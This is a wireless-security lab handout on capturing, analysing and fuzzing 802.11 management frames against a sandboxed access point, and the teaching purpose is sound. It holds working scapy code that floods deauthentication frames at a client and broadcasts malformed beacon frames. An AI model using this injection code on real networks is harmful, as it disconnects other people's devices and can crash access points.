Lab 3: 802.11 Management-Frame Fuzzing

Chapter: 3 (Week 4) Duration: 3 hr Substrate: Alfa AWUS036ACM in monitor mode + Python/scapy + sandboxed lab AP Points: 8

Overview

Capture, analyse, and fuzz 802.11 management frames against an instructor-controlled sandboxed AP. All active injection work is performed on the instructor-isolated lab network; no transmit operations target any production or third-party infrastructure.

Authorization (required before proceeding)

• Lab AP is the instructor-assigned lab target (SSID and BSSID provided by instructor)
• I am operating on the isolated lab network (no internet-facing AP)
• My Alfa NIC is in monitor mode only for passive capture; I will only inject on the instructor's authorization
• I will not deauthenticate any clients except the instructor-controlled lab client

Part 1: Passive 802.11 Frame Collection (45 min)

Enable monitor mode on the Alfa NIC and capture 2 minutes of traffic near the lab AP:

sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon --bssid <lab-AP-BSSID> -c <channel> -w lab3-capture

Load the capture in Wireshark. Apply display filters and answer:

1. How many unique client MAC addresses associated with the lab AP?
2. What security mode is advertised in the RSN IE of the AP's beacons? (Filter: wlan.fc.type_subtype == 0x0008)
3. Does the AP advertise 802.11w (MFP)? Look for the RSN Capabilities field in the RSN IE. The MFP-capable bit is bit 7 (0x0080 in the Capabilities field).
4. What data rates does the AP advertise? (Supported Rates IE in the beacon)

Part 2: Frame-Level Analysis with scapy (45 min)

from scapy.all import rdpcap
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt, Dot11ProbeReq, Dot11Deauth
from collections import Counter

frames = rdpcap("lab3-capture-01.cap")

# Frame type breakdown
type_subtype = []
for f in frames:
    if f.haslayer(Dot11):
        t = f[Dot11].type
        s = f[Dot11].subtype
        type_subtype.append(f"type={t} subtype={s}")

for item, count in Counter(type_subtype).most_common(15):
    print(f"  {item:30s}: {count}")

# RSN IE analysis from beacon
for f in frames:
    if f.haslayer(Dot11Beacon):
        ie = f[Dot11Elt]
        while ie:
            if ie.ID == 48:  # RSN Information Element ID = 48
                print("RSN IE raw bytes:", ie.info.hex())
                break
            ie = ie.payload.getlayer(Dot11Elt)
        break  # just the first beacon

# Probe requests in the capture
probes = {}
for f in frames:
    if f.haslayer(Dot11ProbeReq) and f.haslayer(Dot11Elt):
        src = f.addr2
        ssid = f[Dot11Elt].info.decode('utf-8', errors='replace')
        probes.setdefault(src, set()).add(ssid)

print("\nProbe requests observed:")
for mac, ssids in probes.items():
    print(f"  {mac}: {sorted(ssids)}")

Part 3: Deauth Injection (instructor authorisation required before this step)

Send 10 deauthentication frames to the instructor-controlled lab client:

from scapy.layers.dot11 import Dot11, Dot11Deauth, RadioTap
from scapy.sendrecv import sendp

# Values provided by instructor
AP_BSSID    = "AA:BB:CC:DD:EE:FF"   # replace with actual
CLIENT_MAC  = "11:22:33:44:55:66"   # replace with actual
IFACE       = "wlan0mon"

deauth = (
    RadioTap() /
    Dot11(type=0, subtype=12,
          addr1=CLIENT_MAC,
          addr2=AP_BSSID,
          addr3=AP_BSSID) /
    Dot11Deauth(reason=7)
)

sendp(deauth, iface=IFACE, count=10, inter=0.1, verbose=1)

Capture the result with Wireshark running on a second terminal. Document:

1. Was the deauth successful? (Did the client re-associate after the deauth flood?)
2. Does the AP have 802.11w (MFP) enabled? (If yes, why did the deauth still/not work?)

Part 4: Beacon Fuzzing (limited; instructor-authorized)

Generate five mutated beacon frames with malformed SSID IEs and observe AP/client behavior:

import random
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt, RadioTap
from scapy.sendrecv import sendp

AP_BSSID = "AA:BB:CC:DD:EE:FF"
IFACE = "wlan0mon"

def fuzz_ssid_ie(bssid, ssid_len, iface):
    ssid_content = bytes([random.randint(0, 255) for _ in range(ssid_len)])
    pkt = (
        RadioTap() /
        Dot11(type=0, subtype=8,
              addr1="ff:ff:ff:ff:ff:ff",
              addr2=bssid, addr3=bssid) /
        Dot11Beacon(cap=0x2105) /
        Dot11Elt(ID=0, info=ssid_content) /
        Dot11Elt(ID=1, info=b"\x82\x84\x8b\x96")
    )
    sendp(pkt, iface=iface, count=1, verbose=0)

for test_len in [0, 32, 64, 128, 255]:
    print(f"Sending beacon with SSID IE length={test_len}")
    fuzz_ssid_ie(AP_BSSID, test_len, IFACE)

Monitor the AP log (instructor-provided console access) and Wireshark for:

• Unexpected frames from the AP in response
• AP crash or restart indicators
• Client disconnection events

Virtual Path

Students without a monitor-mode NIC or sandboxed AP complete Parts 1-2 using the pre-captured PCAP lab3-80211-mgmt.pcapng. Parts 3-4 (active injection) require physical hardware; document the expected behavior from the Week 4 lecture notes instead of live execution.

Deliverables

• Wireshark screenshot: beacon frame with RSN IE visible and expanded
• scapy output: frame-type frequency table + RSN IE hex + probe-request list
• Deauth injection result: screenshot + description (was client deauthed? did it reassociate?)
• Fuzzing result: did the AP produce any unexpected response to malformed SSID IEs?
• 1-paragraph security analysis: what does the 802.11w (MFP) status of the lab AP tell you about its deauth-flood resistance?

Grading (8 points)